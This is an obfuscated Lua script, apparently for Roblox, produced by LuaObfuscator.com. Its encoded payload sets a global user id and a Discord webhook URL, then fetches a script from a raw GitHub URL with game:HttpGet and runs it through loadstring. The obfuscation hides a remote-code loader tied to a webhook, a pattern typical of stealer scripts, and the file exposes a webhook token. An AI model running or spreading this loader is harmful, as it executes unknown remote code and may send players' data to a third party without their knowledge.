--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v68=v2(v0(v20,16));if v19 then local v76=v5(v68,v19);v19=nil;return v76;else return v68;end end end);local function v21(v22,v23,v24)if v24 then local v69=(0 + 0) -0 ;local v70;while true do if (v69==((0 -0) + 0)) then v70=(v22/(2^(v23-(1011 -(902 + (320 -212))))))%((1308 -(981 + 325))^(((v24-1) -(v23-(3 -2))) + ((290 + 280) -(327 + 242)))) ;return v70-(v70%(115 -(59 + 55))) ;end end else local v71=(1731 -(919 + 812)) -0 ;local v72;while true do if (v71==(497 -(388 + 109))) then v72=(1819 -(542 + 1275))^(v23-((1679 -(289 + 263)) -(1043 + 83))) ;return (((v22%(v72 + v72))>=v72) and (1726 -(579 + 1146))) or ((0 -0) + 0) ;end end end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1 ;return v38;end local function v26()local v39,v40=v1(v16,v18,v18 + (779 -(520 + 257)) );v18=v18 + 2 + 0 ;return (v40 * (72 + 184)) + v39 ;end local function v27()local v41,v42,v43,v44=v1(v16,v18,v18 + 2 + 1 );v18=v18 + 4 ;return (v44 * (16779180 -(1728 + (1480 -(1089 + 155))))) + (v43 * (29449 + 36087)) + (v42 * (40 + (638 -(134 + 288)))) + v41 ;end local function v28()local v45=v27();local v46=v27();local v47=2 -1 ;local v48=(v21(v46,1,(1905 -(1340 + 472)) -73 ) * ((2 + 0)^(64 -32))) + v45 ;local v49=v21(v46,8 + 13 ,1784 -(1679 + 74) );local v50=((v21(v46,(424 -(6 + 392)) + (14 -8) )==(1 -0)) and  -(2 -1)) or (3 -2) ;if (v49==(0 + 0)) then if (v48==(0 + 0)) then return v50 * (0 + 0) ;else v49=3 -2 ;v47=0 -0 ;end elseif (v49==(2488 -(288 + 153))) then return ((v48==(0 + 0)) and (v50 * ((1 -0)/(592 -(157 + 136 + 299))))) or (v50 * NaN) ;end return v8(v50,v49-(1555 -(2515 -(1773 + 210))) ) * (v47 + (v48/((1698 -(109 + 1587))^((3213 -2025) -(95 + 1041))))) ;end local function v29(v30)local v51;if  not v30 then v30=v27();if (v30==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v30) -(3 -2) );v18=v18 + v30 ;local v52={};for v66=1, #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(2 + 2)) then while true do if (v54==(417 -(383 + 31))) then v61=nil;while true do local v86=0;local v87;while true do if (v86==(811 -(499 + 312))) then v87=464 -(150 + 314) ;while true do if (v87~=(1 + 0)) then else if (v55==2) then local v106=0;local v107;while true do if ((0 + 0)==v106) then v107=0;while true do local v117=0 -0 ;while true do if (v117~=(424 -(18 + 406))) then else if ((875 -(700 + 174))==v107) then local v145=0 -0 ;while true do if (v145~=(434 -(77 + 357))) then else for v168=1,v27() do v58[v168]=v27();end return v59;end end end if (v107==(244 -(189 + 55))) then for v150=2 -1 ,v27() do local v151=0 + 0 ;local v152;while true do if (v151==(0 -0)) then v152=v25();if (v21(v152,1 + 0 ,1 + 0 )==0) then local v172=0 -0 ;local v173;local v174;local v175;local v176;local v177;local v178;while true do if (v172==(2 + 0)) then v177=nil;v178=nil;v172=3 + 0 ;end if (v172==(2 + 1)) then while true do if (v173~=1) then else local v183=0;while true do if (v183~=(1 + 0)) then else v173=1800 -(492 + 1306) ;break;end if (0==v183) then v176=nil;v177=nil;v183=3 -2 ;end end end if (v173==(3 -1)) then v178=nil;while true do if ((0 -0)~=v174) then else v175=0 -0 ;v176=nil;v174=1;end if (2~=v174) then else while true do if (v175==(4 -1)) then if (v21(v177,1851 -(848 + 1000) ,14 -11 )==(1 + 0)) then v178[2 + 2 ]=v61[v178[1 + 3 ]];end v56[v150]=v178;break;end if (v175==2) then local v187=0;while true do if (v187~=(1505 -(166 + 1339))) then else local v196=0;while true do if (v196==(1085 -(872 + 212))) then v187=1;break;end if (v196~=(1823 -(1175 + 648))) then else if (v21(v177,1485 -(905 + 579) ,1206 -(962 + 243) )~=(438 -(142 + 295))) then else v178[1 + 1 ]=v61[v178[1633 -(231 + 1400) ]];end if (v21(v177,1664 -(816 + 846) ,2)~=1) then else v178[325 -(217 + 105) ]=v61[v178[8 -5 ]];end v196=1;end end end if (v187~=(3 -2)) then else v175=2 + 1 ;break;end end end if (v175==1) then local v188=438 -(300 + 138) ;local v189;local v190;while true do if (v188~=0) then else v189=0;v190=nil;v188=651 -(463 + 187) ;end if (v188==(1497 -(1179 + 317))) then while true do if (v189~=(0 -0)) then else v190=1898 -(568 + 1330) ;while true do if (v190==1) then v175=4 -2 ;break;end if (v190==(0 + 0)) then local v203=0;local v204;while true do if (v203==(0 + 0)) then v204=0;while true do if (v204~=0) then else v178={v26(),v26(),nil,nil};if (v176==0) then local v206=0 -0 ;local v207;local v208;while true do if (v206==1) then while true do if (v207==(0 + 0)) then v208=0 -0 ;while true do if (v208~=(0 -0)) then else v178[2 + 1 ]=v26();v178[4]=v26();break;end end break;end end break;end if (v206==0) then local v210=0 + 0 ;while true do if (v210~=0) then else v207=676 -(102 + 574) ;v208=nil;v210=1;end if ((544 -(383 + 160))==v210) then v206=1 + 0 ;break;end end end end elseif (v176==(1735 -(1503 + 231))) then v178[2 + 1 ]=v27();elseif (v176==(4 -2)) then v178[983 -(865 + 115) ]=v27() -((513 -(83 + 428))^16) ;elseif (v176==(739 -(636 + 100))) then local v212=1320 -(175 + 1145) ;local v213;while true do if (v212~=(1963 -(1185 + 778))) then else v213=0;while true do if (v213==(0 -0)) then v178[7 -4 ]=v27() -((4 -2)^(44 -28)) ;v178[4 -0 ]=v26();break;end end break;end end end v204=1;end if (v204==(1 -0)) then v190=1155 -(256 + 898) ;break;end end break;end end end end break;end end break;end end end if (v175~=(0 + 0)) then else local v191=0 -0 ;local v192;while true do if ((0 -0)==v191) then v192=0 -0 ;while true do if (v192==(1 + 0)) then v175=1 + 0 ;break;end if (v192==0) then local v197=0 -0 ;local v198;while true do if (v197==(0 + 0)) then v198=0 -0 ;while true do if (v198==(261 -(142 + 118))) then v192=1 + 0 ;break;end if (v198==(0 -0)) then local v205=0 + 0 ;while true do if ((2 -1)==v205) then v198=689 -(361 + 327) ;break;end if (v205==(0 + 0)) then v176=v21(v152,1 + 1 ,1165 -(69 + 1093) );v177=v21(v152,4,6);v205=1;end end end end break;end end end end break;end end end end break;end if (v174~=(4 -3)) then else local v185=0 -0 ;while true do if (v185~=(2 -1)) then else v174=2;break;end if (v185==0) then local v193=0;while true do if (v193~=(0 -0)) then else v177=nil;v178=nil;v193=1 + 0 ;end if (v193==(1565 -(929 + 635))) then v185=2 -1 ;break;end end end end end end break;end if ((0 -0)==v173) then local v184=0 -0 ;while true do if (v184~=(0 -0)) then else v174=0;v175=nil;v184=1734 -(458 + 1275) ;end if (v184~=(1 + 0)) then else v173=1;break;end end end end break;end if ((1036 -(219 + 817))==v172) then v173=0 + 0 ;v174=nil;v172=1546 -(919 + 626) ;end if (v172==1) then v175=nil;v176=nil;v172=2 -0 ;end end end break;end end end for v153=168 -(165 + 2) ,v27() do v57[v153-(1 -0) ]=v33();end v107=1;end break;end end end break;end end end break;end if ((0 + 0)==v87) then if (v55==(0 + 0)) then local v108=1741 -(888 + 853) ;local v109;local v110;while true do if (v108==0) then v109=0 + 0 ;v110=nil;v108=1 + 0 ;end if (v108==(1202 -(1042 + 159))) then while true do if (0~=v109) then else v110=0 + 0 ;while true do if (v110==2) then v55=1 + 0 ;break;end if ((0 + 0)~=v110) then else local v146=63 -(25 + 38) ;local v147;while true do if (v146==(0 -0)) then v147=0 + 0 ;while true do if ((372 -(6 + 366))==v147) then v56={};v57={};v147=2 -1 ;end if ((1119 -(1029 + 89))==v147) then v110=1282 -(499 + 782) ;break;end end break;end end end if (v110~=1) then else local v148=0 -0 ;while true do if (v148==(0 -0)) then v58={};v59={v56,v57,nil,v58};v148=1;end if (v148==1) then v110=3 -1 ;break;end end end end break;end end break;end end end if (v55==(4 -3)) then local v111=0;while true do if (v111~=(309 -(236 + 72))) then else local v113=1209 -(220 + 989) ;while true do if ((0 -0)==v113) then for v128=1 + 0 ,v60 do local v129=0;local v130;local v131;local v132;local v133;while true do if (v129==(1426 -(76 + 1349))) then v132=nil;v133=nil;v129=2 -0 ;end if (v129~=(5 -3)) then else while true do if ((1009 -(537 + 471))==v130) then v133=nil;while true do if (v131==(0 -0)) then local v179=0 -0 ;while true do if (v179~=1) then else v131=1 + 0 ;break;end if (v179~=(784 -(354 + 430))) then else v132=v25();v133=nil;v179=710 -(320 + 389) ;end end end if (v131~=(1 + 0)) then else if (v132==1) then v133=v25()~=(0 -0) ;elseif (v132==(2 + 0)) then v133=v28();elseif (v132==(11 -8)) then v133=v29();end v61[v128]=v133;break;end end break;end if (v130==(0 + 0)) then local v170=0 + 0 ;while true do if (0==v170) then v131=0 + 0 ;v132=nil;v170=1 + 0 ;end if (v170==1) then v130=1 -0 ;break;end end end end break;end if (v129==(0 -0)) then v130=0 + 0 ;v131=nil;v129=1;end end end v59[3 + 0 ]=v25();v113=1;end if (v113~=1) then else v111=2;break;end end end if (v111==(3 -1)) then v55=2 -0 ;break;end if (v111~=0) then else local v114=0 -0 ;while true do if (v114==(0 -0)) then v60=v27();v61={};v114=1;end if (v114==(1 -0)) then v111=1 + 0 ;break;end end end end end v87=1 + 0 ;end end break;end end end break;end if (v54~=2) then else local v83=0 + 0 ;local v84;while true do if (v83~=(0 -0)) then else v84=0;while true do if (v84==(0 -0)) then v59=nil;v60=nil;v84=4 -3 ;end if (v84==(1692 -(398 + 1293))) then v54=3;break;end end break;end end end if ((4 -3)==v54) then v57=nil;v58=nil;v54=2 + 0 ;end if (0==v54) then local v85=638 -(362 + 276) ;while true do if (v85~=(0 -0)) then else v55=1349 -(518 + 831) ;v56=nil;v85=1;end if ((1 + 0)==v85) then v54=1 + 0 ;break;end end end end break;end if ((1206 -(232 + 972))~=v53) then else v58=nil;v59=nil;v53=5 -2 ;end if (v53==0) then v54=0 -0 ;v55=nil;v53=1 + 0 ;end if (1==v53) then v56=nil;v57=nil;v53=3 -1 ;end if (v53~=(651 -(187 + 461))) then else v60=nil;v61=nil;v53=1 + 3 ;end end end local function v34(v35,v36,v37)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v35[1];v64=v35[2];v62=1;end if (v62==1) then v65=v35[3];return function(...)local v77=0;local v78;local v79;local v80;local v81;local v82;while true do if (v77==2) then v82=nil;v82=function()local v88=v63;local v89=v64;local v90=v65;local v91=v32;local v92={};local v93={};local v94={};for v98=0 + 0 ,v81 do if ((v98>=v90) or ((5925 -3021)<=1534)) then v92[v98-v90 ]=v80[v98 + (608 -(407 + 200)) ];else v94[v98]=v80[v98 + (635 -(372 + 262)) ];end end local v95=(v81-v90) + (2 -1) ;local v96;local v97;while true do local v99=0 -0 ;local v100;while true do if ((v99==(210 -(171 + 39))) or ((12919 -10081)>=(8860 -(108 + 5703)))) then v100=0 -0 ;while true do if (((3819 -2826)==((9873 -6065) -(1764 + 1051))) and (0==v100)) then local v112=1664 -((1249 -604) + (1347 -328)) ;while true do if (((0 -0)==v112) or ((1515 + (3907 -(780 + 141)))<1996)) then v96=v88[v78];v97=v96[1];v112=3 -2 ;end if (((1 -(64 -(36 + 28)))==v112) or (4820<=(9085 -5919))) then v100=1;break;end end end if ((v100==(1893 -(1812 + 80))) or ((10934 -(7627 -(282 + 243)))==2866)) then if ((4884>=(8927 -5318)) and (v97<=(1 + 3))) then if ((((13382 -8596) -3436)<=(1343 + 1820)) and (v97<=(1 + 0))) then if ((v97>0) or (((4119 -2405) -1023)>(10811 -6137))) then local v119=0 + 0 ;local v120;local v121;local v122;while true do if (((654 + 3177)>=(5617 -2064)) and (v119==(1 + 0))) then v122=nil;while true do if ((1614==1614) and (v120==(0 + 0))) then v121=v96[1088 -(1012 + 74) ];v122=v94[v96[2 + 1 ]];v120=1375 -(710 + 664) ;end if (((1477 + 830)>=(5971 -4242)) and (v120==1)) then v94[v121 + (1 -0) ]=v122;v94[v121]=v122[v96[956 -(114 + 838) ]];break;end end break;end if ((v119==(534 -(229 + 305))) or (3094>(11137 -6336))) then v120=0 + 0 + 0 ;v121=nil;v119=1;end end else v94[v96[2]][v96[2 + 1 ]]=v96[1318 -(1252 + 62) ];end elseif ((v97<=2) or (449==(314 + 1712))) then if (((3920 -2899)<(4127 -(510 + 1184))) and (v94[v96[1496 -(899 + 595) ]]==v96[3 + 1 ])) then v78=v78 + 1 + 0 + 0 ;else v78=v96[9 -6 ];end elseif (((4254 -1196)>=(1278 -502)) and (v97==(448 -(166 + 279)))) then v94[v96[2]]=v96[(12 -7) -2 ];else v94[v96[1383 -(961 + 420) ]]=v37[v96[1437 -(1048 + 386) ]];end elseif ((v97<=7) or ((39 + 2341 + 2610)<=(1764 + (1405 -(129 + 79))))) then if ((4590>=(1347 -(572 + 38))) and (v97<=(212 -(43 + 164)))) then local v125=0 + 0 ;local v126;local v127;while true do if ((v125==(335 -(49 + 285))) or ((4461 -2206)>=(877 + 2129))) then while true do if (((2234 -(212 + 1067))==(2926 -(66 + 1905))) and ((0 + 0)==v126)) then v127=v96[4 -2 ];v94[v127]=v94[v127](v13(v94,v127 + (4 -3) ,v79));break;end end break;end if ((v125==(652 -(141 + 249 + 262))) or ((859 + 1071)<(1955 -(1248 + 383)))) then local v149=0 + 0 ;while true do if ((v149==1) or ((112 -38)>=791)) then v125=1 + 0 ;break;end if (((835 -(74 + 761))==v149) or (1679<=1236)) then v126=1524 -(889 + 635) ;v127=nil;v149=1 -0 ;end end end end elseif (((7053 -4150)>=257) and (v97==6)) then local v139=0 -0 ;local v140;local v141;local v142;local v143;while true do if ((v139==1) or ((5774 -(709 + 162))==(2634 -(1363 + 226)))) then local v156=91 -(57 + 34) ;while true do if ((v156==(1754 -(251 + 1503))) or ((1250 -785)>(4559 -2231))) then v79=(v142 + v140) -(1 -0) ;v143=(727 -572) -(102 + 53) ;v156=933 -(212 + 720) ;end if ((v156==(2 -1)) or (((2834 -(128 + 107)) -(625 + (901 -(628 + 185))))>(6158 -4271))) then v139=4 -2 ;break;end end end if (((3718 -(776 + 349))>(1437 -(734 + 598))) and (v139==(0 + 0))) then local v157=0 -0 ;while true do if ((((918 + 4695) -(37 + 1060 + 83))>(7921 -6165)) and (v157==(1 + 0))) then v139=1;break;end if ((((16173 -(257 + 490)) -(54994 -43423))>(6175 -2874)) and (v157==(0 + 0))) then v140=v96[2];v141,v142=v91(v94[v140](v13(v94,v140 + (2 -1) ,v96[1449 -(345 + 1101) ])));v157=1 + 0 ;end end end if (((2230 -((827 -(171 + 100)) + 340))==(766 + 568)) and (v139==((3034 -(559 + 1299)) -(316 + 858)))) then for v165=v140,v79 do local v166=0 -0 ;local v167;while true do if ((0==v166) or ((271 + 536)>=(56 + 756))) then v167=0 + 0 ;while true do if ((v167==(0 + 0)) or ((3878 -(387 + 1208))==(2961 -(52 + 36)))) then v143=v143 + (1 -(1751 -(1068 + 683))) ;v94[v165]=v141[v143];break;end end break;end end end break;end end else do return;end end elseif ((v97<=8) or ((1705 + (2822 -936))>=4769)) then v94[v96[216 -(76 + 138) ]]();elseif ((v97>9) or ((5453 -(1099 + 675))<1313)) then v78=v96[1146 -(1019 + (1534 -(1179 + 231))) ];elseif (((11270 -7467)==(1837 + 1966)) and (v96[4 -(2 + 0) ]==v94[v96[5 -1 ]])) then v78=v78 + (668 -(279 + 388)) ;else v78=v96[6 -3 ];end v78=v78 + (1457 -(1051 + 405)) ;break;end end break;end end end end;v77=3;end if (v77==3) then A,B=v32(v11(v82));if  not A[1] then local v101=v35[4][v78] or "?" ;error("Script error at ["   .. v101   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (0==v77) then v78=1;v79= -1;v77=1;end if (v77==1) then v80={...};v81=v12("#",...) -1 ;v77=2;end end end;end end end return v34(v33(),{},v17)(...);end v15("LOL!0B3O00028O0003023O005F4703063O00557365724944022O00F0E53CA1F04103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303930373338392O3634332O3837393236332F674339674A4237626D4E35784D6A476979322O444E6979466F52554C5163774D706D38316E475F4A426D684C457A6E744F77426F415748754B5554536F58462D634F5A7A026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F5363726970742E6C756100143O0012033O00013O0026023O00080001000100040A3O00080001001204000100023O00302O000100030004001204000100023O00302O0001000500060012033O00073O000E090007000100013O00040A3O00010001001204000100083O001204000200093O00200100020002000A0012030004000B4O0006000200044O000500013O00022O000800010001000100040A3O0013000100040A3O000100012O00073O00017O00143O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
